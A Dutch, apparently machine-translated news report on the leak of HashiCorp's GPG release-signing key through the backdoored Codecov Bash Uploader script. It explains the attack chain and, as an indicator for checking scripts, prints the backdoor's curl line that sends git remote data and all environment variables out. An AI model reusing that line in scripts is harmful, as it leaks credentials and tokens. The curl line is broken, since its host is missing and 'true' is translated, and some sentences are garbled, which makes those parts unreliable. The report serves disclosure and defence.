HashiCorp, het bedrijf achter de open source-tools Vagrant, Packer, Nomad en Terraform, heeft bekendgemaakt dat het een privé-GPG-sleutel heeft gelekt die wordt gebruikt om digitale handtekeningen te creëren waarmee releases worden geverifieerd. Aanvallers die toegang hebben tot de GPG-sleutel, kunnen mogelijk heimelijk wijzigingen aanbrengen in HashiCorp-producten door deze te verifiëren met een geldige digitale handtekening. Tegelijkertijd verklaarde het bedrijf dat er tijdens de uitgevoerde audit geen sporen van pogingen om dergelijke wijzigingen door te voeren, zijn gevonden.
De gecompromitteerde GPG-sleutel is nu ingetrokken en vervangen door een nieuwe sleutel. Het probleem had alleen gevolgen voor de verificatie met behulp van de bestanden SHA256SUM en SHA256SUM.sig en beïnvloedde niet het genereren van digitale handtekeningen. Linux-DEB- en RPM-pakketten worden geleverd via releases.hashicorp.com, evenals mechanismen voor goedkeuring van releases voor macOS и Windows (AuthentiCode).
Het lek ontstond door het gebruik van het Codecov Bash Uploader-script (codecov-bash) binnen de infrastructuur. Dit script is ontworpen om dekkingsrapporten van continue integratiesystemen te downloaden. Tijdens de aanval op Codecov werd er stiekem een backdoor in het script ingevoegd, waarmee wachtwoorden en encryptiesleutels werden verzonden naar Codecov. server indringers.
Om de hack uit te voeren, maakten de aanvallers gebruik van een fout in het proces van het maken van de Codecov Docker-image. Hierdoor konden ze de GCS-toegangsgegevens (Google Cloud Storage) extraheren die nodig waren om wijzigingen aan te brengen in het Bash Uploader-script dat via de website codecov.io werd verspreid. De wijzigingen werden op 31 januari doorgevoerd, bleven twee maanden lang onopgemerkt en stelden aanvallers in staat om informatie te extraheren die was opgeslagen in continue integratieomgevingen van klanten. Met behulp van de toegevoegde schadelijke code kunnen aanvallers informatie verkrijgen over de Git-repository die wordt getest en alle omgevingsvariabelen, waaronder tokens, encryptiesleutels en wachtwoorden die worden verzonden naar continue integratiesystemen om toegang te bieden tot applicatiecode, repositories en services zoals Amazon Web Services en GitHub.
Naast de directe oproep werd het Codecov Bash Uploader-script gebruikt als onderdeel van andere uploaders, zoals Codecov-action (Github), Codecov-circleci-orb en Codecov-bitrise-step. Gebruikers van deze programma's ondervinden ook hinder van het probleem. Alle gebruikers van codecov-bash en gerelateerde producten wordt geadviseerd hun infrastructuur te controleren en wachtwoorden en encryptiesleutels te wijzigen. Je kunt controleren of er een achterdeur in een script zit door de aanwezigheid van de regel curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /uploaden/v2 || WAAR
Bron: opennet.ru
